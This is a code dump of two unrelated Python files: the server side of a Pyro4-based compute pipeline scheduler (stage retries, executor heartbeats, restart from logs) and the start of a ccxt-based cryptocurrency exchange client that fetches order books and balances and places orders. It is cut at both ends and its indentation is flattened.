if self.stages[index].status == 'running':
raise Exception('stage %d is already running' % index)
self.addRunningStageToClient(clientURI, index)
self.currently_running_stages.add(index)
self.stages[index].setRunning()
def checkIfRunnable(self, index):
"""stage added to runnable set if all predecessors finished"""
canRun = ((not self.stages[index].isFinished()) and (self.unfinished_pred_counts[index] == 0))
#logger.debug("Stage %s Runnable: %s", str(index), str(canRun))
return canRun
def setStageFinished(self, index, clientURI, save_state = True,
checking_pipeline_status = False):
"""given an index, sets corresponding stage to finished and adds successors to the runnable set"""
s = self.stages[index]
# since we want to use refcounting (where a 'reference' is an
# unsatisfied dependency of a stage and 'collection' is
# adding to the set of runnable stages) to determine whether a stage's
# prerequisites have run, we make it an error for the same stage
# to finish more than once (alternately, we could merely avoid
# decrementing counts of previously finished stages, but
# this choice should expose bugs sooner)
if s.isFinished():
raise ValueError("Already finished stage %d" % index)
# this function can be called when a pipeline is restarted, and
# we go through all stages and set the finished ones to... finished... :-)
# in that case, we can not remove the stage from the list of running
# jobs, because there is none.
if checking_pipeline_status:
s.status = "finished"
else:
logger.info("Finished Stage %s: %s (on %s)", str(index), str(self.stages[index]), clientURI)
self.removeFromRunning(index, clientURI, new_status = "finished")
# run any potential hooks now that the stage has finished:
for f in s.finished_hooks:
f(s)
self.num_finished_stages += 1
# do some reporting in terms of how many stages have been completed:
roughly_processed = math.floor(self.num_finished_stages / len(self.stages) * 100)
if roughly_processed > self.percent_finished_reported:
# only report it after we've checked the status of the pipeline
if self.verbose and not checking_pipeline_status:
print("\n\nStatus update: " + "\n" + str(self.num_finished_stages) +
" out of " + str(len(self.stages)) + " stages finished.\n" + time.ctime() +
"\nFor more detailed information run (in a separate shell with paths set appropriately):\ncheck_pipeline_status.py "
+ str(self.exec_options.urifile) + "\n")
self.percent_finished_reported = roughly_processed
# write out the (index, hash) pairs to disk. We don't actually need the indices
# for anything (in fact, the restart code in skip_completed_stages is resilient
# against an arbitrary renumbering of stages), but a human-readable log is somewhat useful.
if not checking_pipeline_status:
self.finished_stages_fh.write("%d,%s\n" % (index, self.stages[index].getHash()))
self.finished_stages_fh.flush()
            # FIXME flush could be turned off as an optimization (more sensibly, a small buffer size could be set)
# ... though we might not record a stage's completion, this doesn't affect correctness.
for i in self.G.successors(index):
self.unfinished_pred_counts[i] -= 1
if self.checkIfRunnable(i):
self.enqueue(i)
def removeFromRunning(self, index, clientURI, new_status):
try:
self.currently_running_stages.discard(index)
except:
logger.exception("Unable to remove stage %d from client %s's stages: %s", index, clientURI, self.clients[clientURI].running_stages)
self.removeRunningStageFromClient(clientURI, index)
self.stages[index].status = new_status
def setStageLost(self, index, clientURI):
"""Clean up a stage lost due to unresponsive client"""
logger.warning("Lost Stage %d: %s: ", index, self.stages[index])
self.removeFromRunning(index, clientURI, new_status = None)
self.enqueue(index)
def setStageFailed(self, index, clientURI):
# given an index, sets stage to failed, adds to failed stages array
# But... only if this stage has already been retried twice (<- for now static)
# Once in while retrying a stage makes sense, because of some odd I/O
# read write issue (NFS race condition?). At least that's what I think is
# happening, so trying this to see whether it solves the issue.
num_retries = self.stages[index].getNumberOfRetries()
if num_retries < 2:
# without a sleep statement, the stage will be retried within
# a handful of milliseconds, that won't solve anything...
# this sleep command will block the server for a small amount
# of time, but should happen only sporadically
#time.sleep(STAGE_RETRY_INTERVAL)
self.removeFromRunning(index, clientURI, new_status = None)
self.stages[index].incrementNumberOfRetries()
logger.info("RETRYING: ERROR in Stage " + str(index) + ": " + str(self.stages[index]) + "\n"
+ "RETRYING: adding this stage back to the runnable set.\n"
+ "RETRYING: Logfile for Stage " + str(self.stages[index].logFile) + "\n")
self.enqueue(index)
else:
self.removeFromRunning(index, clientURI, new_status = "failed")
logger.info("ERROR in Stage " + str(index) + ": " + str(self.stages[index]))
# This is something we should also directly report back to the user:
print("\nERROR in Stage %s: %s" % (str(index), str(self.stages[index])))
print("Logfile for (potentially) more information:\n%s\n" % self.stages[index].logFile)
sys.stdout.flush()
self.failedStages.append(index)
for i in nx.dfs_successors(self.G, index).keys():
self.failedStages.append(i)
@functools.lru_cache(maxsize=None) # must cache *all* results!
def prepare_to_run(self, i):
"""Some pre-run tasks that must only run once
(in the current model, `enqueue` may run arbitrarily many times!)"""
for f in self.stages[i]._runnable_hooks:
f(self.stages[i])
# the easiest place to ensure that all stages request at least
# the default job mem is here. The hooks above might estimate
# memory for the jobs, here we'll override that if they requested
# less than the minimum
if self.stages[i].mem < self.exec_options.default_job_mem:
self.stages[i].setMem(self.exec_options.default_job_mem)
# scale everything by the memory_factor
# FIXME this may run several times ... weird !!
self.stages[i].setMem(self.stages[i].mem * self.exec_options.memory_factor)
def enqueue(self, i):
"""Update pipeline data structures and run relevant hooks when a stage becomes runnable."""
#logger.debug("Queueing stage %d", i)
self.runnable.add(i)
self.prepare_to_run(i)
# keep track of the memory requirements of the runnable jobs
self.mem_req_for_runnable.append(self.stages[i].mem)
"""
Returns True unless all stages are finished, then False
This function also checks to see whether executors can be launched. The
server keeps track of how many executors are launched/registered. If the
server set to launch executors itself, it will do so if there are runnable
stages and the addition of launched/registered executors is smaller than
the max number of executors it can launch
"""
def continueLoop(self):
if self.verbose:
print('.', end="", flush=True)
        # We may have been called one last time just as the parent thread is exiting
# (if it wakes us with a signal). In this case, don't do anything:
if self.shutdown_ev.is_set():
logger.debug("Shutdown event is set ... quitting")
return False
elif self.allStagesCompleted():
logger.info("All stages complete ... done")
return False
# exit if there are still stages that need to be run,
# but when there are no runnable nor any running stages left
# (e.g., if some stages have repeatedly failed)
# TODO this might indicate a bug, so better reporting would be useful
elif (len(self.runnable) == 0
and len(self.currently_running_stages) == 0):
logger.info("ERROR: no more runnable stages, however not all stages have finished. Going to shut down.")
print("\nERROR: no more runnable stages, however not all stages have finished. Going to shut down.\n")
sys.stdout.flush()
return False
# return False if all executors have died but not spawning new ones:
# 1) there are stages that can be run, and
# 2) there are no running nor waiting executors, and
# 3) the number of lost executors has exceeded the number of allowed failed executors
elif (len(self.runnable) > 0 and
(self.number_launched_and_waiting_clients + len(self.clients)) == 0 and
self.failed_executors > self.exec_options.max_failed_executors):
msg = ("\nError: %d executors have died. This is more than the number"
"(%d) allowed by --max-failed-executors. No executors remain; exiting..."
% (self.failed_executors, self.exec_options.max_failed_executors))
print(msg)
logger.warning(msg)
return False
# TODO combine with above clause?
else:
if len(self.runnable) > 0:
highest_mem_stage = self.highest_memory_stage(self.runnable)
max_memory_required = highest_mem_stage.mem
if ((len(self.runnable) > 0) and
# require no running jobs rather than no clients
# since in some configurations (e.g., currently SciNet config has
# the server-local executor shut down only when the server does)
# the latter choice might lead to the system
# running indefinitely with no jobs
(self.number_launched_and_waiting_clients + len(self.clients) == 0 and
max_memory_required > self.memAvail)):
msg = ("\nShutting down due to jobs (e.g. `%s`) which require more memory (%.2fG) than the amount requestable. "
"Please use the --mem argument to increase the amount of memory that executors can request."
% (str(highest_mem_stage)[:1000], max_memory_required))
print(msg)
logger.warning(msg)
return False
else:
return True
#@Pyro4.oneway
def updateClientTimestamp(self, clientURI, tick):
t = time.time() # use server clock for consistency
try:
self.clients[clientURI].timestamp = t
logger.debug("Client %s updated timestamp (tick %d)",
clientURI, tick)
except:
print("\nError: could not find client %s while updating the time stamp" % clientURI)
logger.exception("clientURI not found in server client list:")
raise
# requires: stages != []
# a better interface might be (self, [stage]) -> { MemAmount : (NumStages, [Stage]) }
# or maybe the same using a heap (to facilitate getting N stages with most memory)
def highest_memory_stage(self, stages):
s = max(stages, key=lambda i: self.stages[i].mem)
return self.stages[s]
def max_memory_required(self, stages):
return self.highest_memory_stage(stages).mem # TODO don't use below, propagate stage # ....
# this can't be a loop since we call it via sockets and don't want to block the socket forever
def manageExecutors(self):
logger.debug("Checking if executors need to be launched ...")
executors_to_launch = self.numberOfExecutorsToLaunch()
if executors_to_launch > 0:
# RAM needed to run a single job:
max_memory_stage = self.highest_memory_stage(self.runnable)
memNeeded = max_memory_stage.mem # self.max_memory_required(self.runnable)
# RAM needed to run `proc` most expensive jobs (not the ideal choice):
memWanted = sum(sorted([self.stages[i].mem for i in self.runnable],
key = lambda x: -x)[0:self.exec_options.proc])
logger.debug("wanted: %s", memWanted)
logger.debug("needed: %s", memNeeded)
if memNeeded > self.memAvail:
msg = "\nA stage (%s) requires %.2fG of memory to run, but max allowed is %.2fG" \
% (str(max_memory_stage)[:1000], memNeeded, self.memAvail)
logger.error(msg)
print(msg)
else:
if self.exec_options.greedy:
mem = self.memAvail
elif memWanted <= self.memAvail:
mem = memWanted
else:
mem = self.memAvail #memNeeded?
try:
self.launchExecutorsFromServer(executors_to_launch, mem)
print("\nSubmitted " + str(executors_to_launch) + " executors (clients) to the queue."
"\nWaiting for them to register with the server...")
except pe.SubmitError:
logger.exception("Failed to submit executors; will retry")
logger.debug("... checking for crashed executors ...")
if self.exec_options.monitor_heartbeats:
# look for dead clients and requeue their jobs
t = time.time()
# copy() as unregisterClient mutates self.clients during iteration over the latter
for uri,client in self.clients.copy().items():
dt = t - client.timestamp
if dt > pe.HEARTBEAT_INTERVAL + self.exec_options.latency_tolerance:
logger.warning("Executor at %s has died (no contact for %.1f sec)!", client.clientURI, dt)
ct = time.time()
logger.warning("Difference between time used as reference and current time: %.3f", ct-t)
print("\nWarning: there has been no contact with %s, for %.1f seconds. Considering the executor as dead!\n" % (client.clientURI, dt))
if self.failed_executors > self.exec_options.max_failed_executors:
logger.warning("Currently %d executors have died. This is more than the number of allowed failed executors as set by the flag: --max-failed-executors. Too many executors lost to spawn new ones" % self.failed_executors)
self.failed_executors += 1
# the unregisterClient function will automatically requeue the
# stages that were associated with the lost client
self.unregisterClient(client.clientURI)
logger.debug("... done.")
"""
Returns an integer indicating the number of executors to launch
This function first verifies whether the server can launch executors
    on its own (self.exec_options.num_exec != 0). Then it checks to
see whether the executors are able to kill themselves. If they are,
it's possible that new executors need to be launched. This happens when
there are runnable stages, but the number of active executors is smaller
than the number of executors the server is able to launch
"""
def numberOfExecutorsToLaunch(self):
if self.failed_executors > self.exec_options.max_failed_executors:
return 0
if (len(self.runnable) > 0 and
self.max_memory_required(self.runnable) > self.memAvail):
# we might still want to launch executors for the stages with smaller
# requirements
return 0
if self.exec_options.num_exec != 0:
# Server should launch executors itself
# This should happen regardless of whether or not executors
# can kill themselves, because the server is now responsible
# for the initial launches as well.
active_executors = self.number_launched_and_waiting_clients + len(self.clients)
desired_num_executors = min(len(self.runnable), self.exec_options.num_exec)
executor_launch_room = desired_num_executors - active_executors
# there are runnable stages, and there is room to launch
# additional executors
return max(executor_launch_room, 0)
else:
return 0
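    # Worked example (hypothetical numbers): with 10 runnable stages, num_exec = 4,
    # one registered client and one launched-but-waiting client, the method returns
    # max(min(10, 4) - (1 + 1), 0) = 2, i.e. two more executors may be launched.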
def launchExecutorsFromServer(self, number_to_launch, memNeeded):
logger.info("Launching %i executors", number_to_launch)
try:
launchPipelineExecutors(options=self.options, number=number_to_launch,
mem_needed=memNeeded, uri_file=self.exec_options.urifile)
self.number_launched_and_waiting_clients += number_to_launch
except:
logger.exception("Failed launching executors from the server.")
raise
def getProcessedStageCount(self):
return self.num_finished_stages
def registerClient(self, clientURI, maxmemory):
# Adds new client (represented by a URI string)
# to array of registered clients. If the server launched
# its own clients, we should remove 1 from the number of launched and waiting
# clients (It's possible though that users launch clients themselves. In that
# case we should not decrease this variable)
# FIXME this is a completely broken way to decide whether to decrement ...
self.clients[clientURI] = ExecClient(clientURI, maxmemory)
if self.number_launched_and_waiting_clients > 0:
self.number_launched_and_waiting_clients -= 1
logger.debug("Client registered (Eh!): %s", clientURI)
if self.verbose:
print("\nClient registered (Eh!): %s" % clientURI, end="")
#@Pyro4.oneway
def unregisterClient(self, clientURI):
# removes a client URI string from the table of registered clients. An executor
# calls this method when it decides on its own to shut down,
# and the server may call it when a client is unresponsive
logger.debug("unregisterClient: un-registering %s", clientURI)
try:
for s in self.clients[clientURI].running_stages.copy():
self.setStageLost(s, clientURI)
del self.clients[clientURI]
except:
if self.verbose:
print("\nUnable to un-register client: " + clientURI)
logger.exception("Unable to un-register client: " + clientURI)
else:
if self.verbose:
print("\nClient un-registered (Cheers!): " + clientURI, end="")
logger.info("Client un-registered (Cheers!): " + clientURI)
def incrementLaunchedClients(self):
self.number_launched_and_waiting_clients += 1
def skip_completed_stages(self):
logger.debug("Consulting logs to determine skippable stages...")
try:
with open(self.backupFileLocation, 'r') as fh:
# a stage's index is just an artifact of the graph construction,
# so load only the hashes of finished stages
previous_hashes = frozenset((e.split(',')[1] for e in fh.read().split()))
except:
logger.info("Finished stages log doesn't exist or is corrupt.")
return
runnable = []
finished = []
completed = 0
while True:
# self.runnable should be populated initially by the graph heads.
# Traverse the graph by removing stages from the runnable set and,
# if they don't need to be re-run, adding their dependencies to that set
# (via setStageFinished); if they do, accumulate them. Once this set is emptied,
# we have computed a set of stages which must and can be run
# (either because the input/output filenames or command has changed
# or because an ancestor has re-run, i.e., the files themselves have changed)
# but whose ancestors have already been run
flag,i = self.getRunnableStageIndex()
            if i is None:
break
s = self.getStage(i)
if not isinstance(s, CmdStage):
runnable.append(i)
continue
h = s.getHash()
# we've never run this command before
            if h not in previous_hashes:
runnable.append(i)
continue
if self.options.application.smart_restart:
latest_input_mtime = max([os.stat(inputFile).st_mtime for inputFile in s.inputFiles])
latest_output_mtime = max([os.stat(outputFile).st_mtime for outputFile in s.outputFiles])
#this command's inputFiles were modified after its outputFiles, so rerun it.
if (latest_input_mtime > latest_output_mtime):
runnable.append(i)
continue
self.setStageFinished(i, clientURI = "fake_client_URI", checking_pipeline_status = True)
finished.append((i, h)) # stupid ... duplicates logic in setStageFinished ...
completed += 1
logger.debug("Runnable: %s", runnable)
for i in runnable:
self.enqueue(i)
with open(self.backupFileLocation, 'w') as fh:
# TODO For further optimization, it might (?) be even faster to write to memory and then
# make a single file write when finished.
            # FIXME should write to a tmp file in the same dir, then overwrite (?) since otherwise an interruption
# in writing this file will cause progress to be lost
for l in finished:
fh.write("%d,%s\n" % l)
logger.info('Previously completed stages (of %d total): %d', len(self.stages), completed)
def printShutdownMessage(self):
# it is possible that pipeline.continueLoop returns false, even though the
# pipeline is not completed (for instance, when stages failed, and no more stages
# can be run) so check that in order to provide the correct feedback to the user
print("\n\n######################################################")
print("Shutting down (" + str(len(self.clients)) + " clients remaining) ...")
if self.allStagesCompleted():
print("All pipeline stages have been processed.")
print("Pipeline finished successfully!")
else:
print("Not all pipeline stages have been processed,")
print("however there are no more stages that can be run.")
print("Pipeline failed...")
print("######################################################\n")
logger.debug("Clients still registered at shutdown: " + str(self.clients))
sys.stdout.flush()
def launchPipelineExecutors(options, mem_needed, number, uri_file):
"""Launch pipeline executors directly from pipeline"""
if options.execution.local or not options.execution.queue_type:
for _ in range(number):
e = pe.pipelineExecutor(options=options.execution,
uri_file=uri_file,
pipeline_name=options.application.pipeline_name,
memNeeded=mem_needed)
# since launchPipelineExecutors can be called from server,
# need some concurrency or pe.launchExecutor will hang server ....
threading.Thread(target=pe.launchExecutor, args=(e,)).start()
#pe.launchExecutor(e)
else:
pipelineExecutor = pe.pipelineExecutor(options=options.execution,
uri_file=uri_file,
pipeline_name=options.application.pipeline_name,
memNeeded=mem_needed)
pipelineExecutor.submitToQueue(number=number)
def launchServer(pipeline):
options = pipeline.options
pipeline.printStages(options.application.pipeline_name)
pipeline.printNumberProcessedStages()
# expensive, so only create for pipelines that will actually run
pipeline.shutdown_ev = Event()
# for ideological reasons this should live in a method, but pipeline init is
# rather baroque anyway, and arguably launchServer/pipelineDaemon ought to be
# a single method with cleaned-up initialization
executors_local = pipeline.exec_options.local or (pipeline.exec_options.queue_type is None)
if executors_local:
# measured once -- we assume that server memory usage will be
# roughly constant at this point
pipeline.memAvail = pipeline.exec_options.mem - (float(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss) / 10**6) # 2^20?
else:
pipeline.memAvail = pipeline.exec_options.mem
# is the server going to be verbose or not?
if options.application.verbose:
verboseprint = print
else:
verboseprint = lambda *args: None
# getIpAddress is similar to socket.gethostbyname(...)
# but uses a hack to attempt to avoid returning localhost (127....)
network_address = Pyro4.socketutil.getIpAddress(socket.gethostname(),
workaround127 = True, ipVersion = 4)
daemon = Pyro4.core.Daemon(host=network_address)
pipelineURI = daemon.register(pipeline)
if options.execution.use_ns:
# in the future we might want to launch a nameserver here
# instead of relying on a separate executable running
ns = Pyro4.locateNS()
ns.register("pipeline", pipelineURI)
else:
# If not using Pyro NameServer, must write uri to file for reading by client.
uf = open(options.execution.urifile, 'w')
uf.write(pipelineURI.asString())
uf.close()
pipeline.setVerbosity(options.application.verbose)
shutdown_time = pe.EXECUTOR_MAIN_LOOP_INTERVAL + options.execution.latency_tolerance
try:
t = Process(target=daemon.requestLoop)
# t.daemon = True
t.start()
# at this point requests made to the Pyro daemon will touch process `t`'s copy
        # of the pipeline, so modifying `pipeline` won't have any effect. The exception is
# communication through its multiprocessing.Event, which we use below to wait
# for termination.
#FIXME does this leak the memory used by the old pipeline?
#if so, avoid doing this or at least `del` the old graph ...
verboseprint("Daemon is running at: %s" % daemon.locationStr)
logger.info("Daemon is running at: %s", daemon.locationStr)
verboseprint("The pipeline's uri is: %s" % str(pipelineURI))
logger.info("The pipeline's uri is: %s", str(pipelineURI))
e = pipeline.shutdown_ev
# handle SIGTERM (sent by SciNet 15-30s before hard kill) by setting
# the shutdown event (we shouldn't actually see a SIGTERM on PBS
# since PBS submission logic gives us a lifetime related to our walltime
# request ...)
def handler(sig, _stack):
e.set()
signal.signal(signal.SIGTERM, handler)
# spawn a loop to manage executors in a separate process
# (here we use a proxy to make calls to manageExecutors because (a)
# processes don't share memory, (b) so that its logic is
# not interleaved with calls from executors. We could instead use a `select`
# for both Pyro and non-Pyro socket events; see the Pyro documentation)
p = Pyro4.Proxy(pipelineURI)
#mem, memAvail = pipeline.options.execution.mem, pipeline.memAvail
def loop():
try:
logger.debug("Auxiliary loop started")
logger.debug("memory limit: %.3G; available after server overhead: %.3fG" % (options.execution.mem, pipeline.memAvail))
while p.continueLoop():
p.manageExecutors()
e.wait(LOOP_INTERVAL)
except:
logger.exception("Server loop encountered a problem. Shutting down.")
finally:
logger.info("Server loop going to shut down ...")
p.set_shutdown_ev()
h = Process(target=loop)
h.daemon = True
h.start()
#del pipeline # `top` shows this has no effect on vmem
try:
            jid = os.environ["PBS_JOBID"]
            output = subprocess.check_output(['qstat', '-f', jid], stderr=subprocess.STDOUT).decode()
            time_left = int(re.search(r'Walltime.Remaining = (\d*)', output).group(1))
logger.debug("Time remaining: %d s" % time_left)
time_to_live = time_left - shutdown_time
except:
logger.info("I couldn't determine your remaining walltime from qstat.")
time_to_live = None
flag = e.wait(time_to_live)
if not flag:
logger.info("Time's up!")
e.set()
# FIXME if we terminate abnormally, we should _actually_ kill child executors (if running locally)
except KeyboardInterrupt:
logger.exception("Caught keyboard interrupt, killing executors and shutting down server.")
print("\nKeyboardInterrupt caught: cleaning up, shutting down executors.\n")
sys.stdout.flush()
except:
logger.exception("Exception running server in daemon.requestLoop. Server shutting down.")
raise
else:
# allow time for all clients to contact the server and be told to shut down
# (we could instead add a way for the server to notify its registered clients):
# otherwise they will crash when they try to contact the (shutdown) server.
# It's not important that clients shut down properly (if they see a server crash, they
# will cancel their running jobs, but they're done by the time the server exits)
# TODO this only makes sense if we are actually shutting down nicely,
# and not because we're out of walltime, in which case this doesn't help
# (client jobs will die anyway)
#print("Sleeping %d s to allow time for clients to shutdown..." % pe.SHUTDOWN_TIME)
#time.sleep(pe.SHUTDOWN_TIME)
# trying to access variables from `p` in the `finally` clause (in order
# to print a shutdown message) hangs for some reason, so do it here instead
p.printShutdownMessage()
finally:
# brutal, but awkward to do with our system of `Event`s
# could send a signal to `t` instead:
t.terminate()
def flatten_pipeline(p):
"""return a list of tuples for each stage.
Each item in the list is (id, command, [dependencies])
where dependencies is a list of stages depend on this stage to be complete before they run.
"""
def post(x, y):
if y[0] in x[2]:
return 1
elif x[0] in y[2]:
return -1
else:
return 0
return sorted([(i, str(p.stages[i]), p.G.predecessors(i)) for i in p.G.nodes()], key=functools.cmp_to_key(post))
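# Illustrative output (hypothetical stages): for a two-stage pipeline in which stage 1
# consumes the output of stage 0, flatten_pipeline would return something like
#     [(0, "first_command in.file mid.file", []),
#      (1, "second_command mid.file out.file", [0])]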
def pipelineDaemon(pipeline, options, programName=None):
"""Launches Pyro server and (if specified by options) pipeline executors"""
if options.execution.urifile is None:
options.execution.urifile = create_uri_filename_from_options(options.application.pipeline_name)
if options.application.restart:
pipeline.skip_completed_stages()
if len(pipeline.runnable) == 0:
print("\nPipeline has no runnable stages. Exiting...")
sys.exit()
logger.debug("Prior to starting server, total stages %i. Number processed: %i.",
len(pipeline.stages), pipeline.num_finished_stages)
logger.debug("Number of runnable stages: %i",
len(pipeline.runnable))
pipeline.programName = programName
try:
# we are now appending to the stages file since we've already written
# previously completed stages to it in skip_completed_stages
with open(pipeline.backupFileLocation, 'a') as fh:
pipeline.finished_stages_fh = fh
logger.debug("Starting server...")
launchServer(pipeline)
except:
logger.exception("Exception (=> quitting): ")
raise
#finally:
# sys.exit(0)
|
exchange_client.py
|
# from abc import ABC, abstractmethod
from time import sleep, time
import requests
import sys
from silver_waffle.base.side import ASK, BID
from silver_waffle.base.exchange import Order, Currency, Pair
from silver_waffle.credentials import Credential
import silver_waffle.credentials
from random import randint
import json
import websocket
import ccxt
import threading
from tenacity import RetryError, retry, stop_after_attempt
import importlib
number_of_attempts = 10
class ExchangeClient:
all_currencies = []
CCXT_QUOTE_KEYS = ['quote', 'quoteAsset', 'quote_currency']
CCXT_BASE_KEYS = ['base', 'baseAsset', 'base_currency']
CCXT_TICKSIZE_KEYS = ['tickSize', 'price_tick', 'minimum_order_amount']
def __init__(self, exchange: str = None, websockets_client=None,
socket_settings={'book': True, 'orders': True, 'transactions': True},
whitelist=None, creds={}, read_only=None, auto_initialize=True, auto_detect_credentials=True):
if exchange is not None:
try:
if creds:
if isinstance(creds, Credential):
self.ccxt_client = getattr(ccxt, exchange)(creds.to_ccxt_credential())
else:
self.ccxt_client = getattr(ccxt, exchange)(creds)
self.read_only = False
if not creds:
if auto_detect_credentials:
credentials = silver_waffle.credentials.find_credentials_by_exchange_name(exchange)
if credentials:
print(f"Found credentials for exchange {exchange}")
self.ccxt_client = getattr(ccxt, exchange)(credentials[0].to_ccxt_credential())
self.read_only = False
else:
self.ccxt_client = getattr(ccxt, exchange)()
self.read_only = True
else:
self.ccxt_client = getattr(ccxt, exchange)()
self.read_only = True
if read_only is not None:
self.read_only = read_only
except AttributeError:
try:
module = importlib.import_module(f'silver_waffle.exchanges.{exchange.lower()}')
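                    # NOTE: returning a value from __init__ raises a TypeError at runtime;
                    # this exchange-specific fallback would need a factory or __new__ to work as intended.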
return getattr(module, exchange.lower().capitalize())()
except (ModuleNotFoundError, AttributeError):
raise ValueError('Exchange not found')
self.creds = creds
self.websockets_client = websockets_client
self.name = exchange
self._update_book_sleep_time = 1
self._update_balance_sleep_time = 7
self.pairs = set()
self.pairs_by_ticker = {}
self.pairs_to_always_update = set()
self.currencies_by_symbol = {}
self.currencies = set()
self._rate_limits_timestamps = {}
self.cooldown = 2
self.threads = {}
self.update_book_if_balance_is_empty = True
self._whitelist = whitelist
self._socket_settings = socket_settings
self.socket_functionality = {}
if auto_initialize:
self.initialize()
def initialize(self):
currencies, pairs = self.get_list_of_currencies_and_pairs(whitelist=self._whitelist)
for pair in pairs:
self._register_pair_and_currencies(pair, socket_settings=self._socket_settings)
if self.read_only is False:
for currency in [pair.base, pair.quote]:
if not (currency in self.threads and self.threads[currency]):
self._launch_thread(self.__update_balance_daemon__, currency)
self.all_currencies += currencies
for currency in currencies:
currency_count = 0
for all_currency in self.all_currencies:
if currency.symbol.lower() == all_currency.symbol.lower():
currency_count += 1
if currency_count == 1:
self._launch_thread(self.__update_global_price_daemon__, currency)
@retry(stop=stop_after_attempt(number_of_attempts))
def get_book(self, pair):
"""Returns a dictionary containing the buy and sell orders.
return format: {ASK: list_of_asks, BID: list_of_bids}"""
book = self.ccxt_client.fetch_order_book(pair.ticker)
asks = [{'amount': x[1], 'price': x[0]} for x in book['asks']]
bids = [{'amount': x[1], 'price': x[0]} for x in book['bids']]
return {ASK: asks, BID: bids}
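    # Illustrative return value (hypothetical numbers):
    #     {ASK: [{'amount': 0.5, 'price': 101.0}, ...],
    #      BID: [{'amount': 1.2, 'price': 99.5}, ...]}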
@retry(stop=stop_after_attempt(number_of_attempts))
def get_balance(self, currency):
"""Returns the available and locked balance of a currency, in that order"""
balances = self.ccxt_client.fetch_balance()
try:
return balances[currency.symbol]['free'], balances[currency.symbol]['used']
except KeyError:
return 0, 0
@retry(stop=stop_after_attempt(number_of_attempts))
def get_active_orders(self, pair):
orders = self.ccxt_client.fetch_open_orders(symbol=pair.ticker)
result = {ASK: [], BID: []}
for order in orders:
side = ASK if order['side'] == 'sell' else BID
result[side].append(Order(order['price'], side, order['amount'], order_id=order['id'], pair=pair))
return result
@retry(stop=stop_after_attempt(number_of_attempts))
def cancel_order(self, order):
try:
self.ccxt_client.cancel_order(order.order_id, order.pair.ticker)
except ccxt.base.errors.ArgumentsRequired:
print(order.pair.ticker)
def create_order(self, pair, amount, side, limit_price=None):
if limit_price is None:
            if side is ASK:
                order = self.ccxt_client.create_market_sell_order(pair.ticker, amount)
            elif side is BID:
                order = self.ccxt_client.create_market_buy_order(pair.ticker, amount)
else:
if side is ASK:
order = self.ccxt_client.create_limit_sell_order(pair.ticker, amount, limit_price)
elif side is BID:
order = self.ccxt_client.create_limit_buy_order(pair.ticker, amount, limit_price)
return Order(limit_price, side, amount, pair=pair, order_id=order['id'])
def subscribe(self, pair):
self._register_pair_and_currencies(pair)
self.__start_threads__(pair)
def unsubscribe(self, pair):
pass
@retry(stop=stop_after_attempt(number_of_attempts))
def get_list_of_currencies_and_pairs(self, whitelist=None):
markets = self.ccxt_client.fetch_markets()
list_of_currencies = set([])
list_of_pairs = []
for pair in markets:
if pair['active'] is False:
continue
for quote_key, base_key in zip(self.CCXT_QUOTE_KEYS, self.CCXT_BASE_KEYS):
try:
quote_symbol = pair['info'][quote_key]
base_symbol = pair['info'][base_key]
except KeyError:
continue
base_curr = quote_curr = None
ticker = pair['symbol']
#CCXT is inconsistent across exchanges so we have to do this
for key in self.CCXT_TICKSIZE_KEYS:
try:
minimum_step = pair['info'][key][0]
break
except KeyError:
try:
minimum_step = pair['info']['filters'][0][key]
break
except KeyError:
try:
minimum_step = pair['info'][key]
break
except KeyError:
continue
if whitelist is not None and ticker not in whitelist:
continue
for curr in list_of_currencies:
if base_symbol == curr.symbol:
base_curr = curr
if quote_symbol == curr.symbol:
quote_curr = curr
if not base_curr:
base_curr = Currency(name=base_symbol, symbol=base_symbol,
exchange_client=self)
if not quote_curr:
quote_curr = Currency(name=quote_symbol, symbol=quote_symbol,
exchange_client=self)
pair = Pair(ticker=ticker, quote=quote_curr, base=base_curr,
minimum_step=minimum_step, exchange_client=self)
# print(f"{pair.quote.name}{pair.base.name}")
list_of_pairs.append(pair)
list_of_currencies.add(quote_curr)
list_of_currencies.add(base_curr)
return list(list_of_currencies), list_of_pairs
def get_pair_by_ticker(self, ticker):
for pair in self.pairs:
if pair.ticker.lower() == ticker.lower():
return pair
def _register_pair_and_currencies(self, pair, socket_settings=None):
self.pairs.add(pair)
self.currencies.add(pair.quote)
self.currencies.add(pair.base)
self.pairs_by_ticker.update({pair.ticker: pair})
self.currencies_by_symbol.update({pair.quote.symbol: pair.quote, pair.base.symbol: pair.base})
if socket_settings:
self.socket_functionality[pair] = socket_settings
def _launch_thread(self, thread, pair_or_currency):
thread = threading.Thread(target=thread, args=[pair_or_currency])
thread.daemon = True
if pair_or_currency not in self.threads:
self.threads[pair_or_currency] = []
self.threads[pair_or_currency].append(thread)
thread.start()
def __start_threads__(self, pair):
assert pair in self.pairs
if not (pair in self.threads and self.threads[pair]):
self._launch_thread(self.__update_book_daemon__, pair)
# for currency in [pair.quote, pair.base]:
# if not (currency in self.threads and self.threads[currency]):
#
def __update_book_daemon__(self, pair):
def exit_thread():
self.threads[pair] = None
sys.exit() # exit from the current thread
sleep(randint(0, self._update_book_sleep_time))
while True:
while self.socket_functionality[pair]['book'] is True and self.websockets_client is not None:
sleep(self._update_book_sleep_time)
if not self.update_book_if_balance_is_empty:
if pair.status[BID] and not pair.status[ASK] and pair.quote.balance_is_empty():
sleep(5)
continue
if pair.status[ASK] and not pair.status[BID] and pair.base.balance_is_empty():
sleep(5)
continue
if pair.base.balance_is_empty() and pair.quote.balance_is_empty():
sleep(5)
continue
if pair or pair in self.pairs_to_always_update:
pair.orderbook.update(self.get_book(pair))
sleep(self._update_book_sleep_time)
else:
sleep(5)
def __update_balance_daemon__(self, currency):
sleep(randint(0, self._update_balance_sleep_time))
while True:
if currency.has_an_active_pair():
currency.update_balance()
sleep(self._update_balance_sleep_time)
def __update_global_price_daemon__(self, currency):
sleep(randint(20, 80))
while True:
currencies_to_update = []
for all_currency in self.all_currencies:
if currency.symbol.lower() == all_currency.symbol.lower():
currencies_to_update.append(all_currency)
try:
price = currency.get_global_price()
except (requests.exceptions.HTTPError, UnboundLocalError):
continue
except Exception:
sys.exit()
# log this
            for curr in currencies_to_update:
                curr.global_price = price
sleep(120)
def __str__(self):
return self.name
def __repr__(self):
return self.__str__()
class WebsocketsClient(object):
def __init__(self, ws_uri, exchange_client):
self._ws_url = ws_uri
self.exchange_client = exchange_client
self.ws_client = websocket.WebSocketApp(self._ws_url,
on_message=self._on_message,
on_error=self._on_error,
on_close=self._on_close)
self._print = False
self.is_closed = True
def connect(self):
self.wst = threading.Thread(target=self._connect)
self.wst.daemon = True
self.wst.start()
def _connect(self):
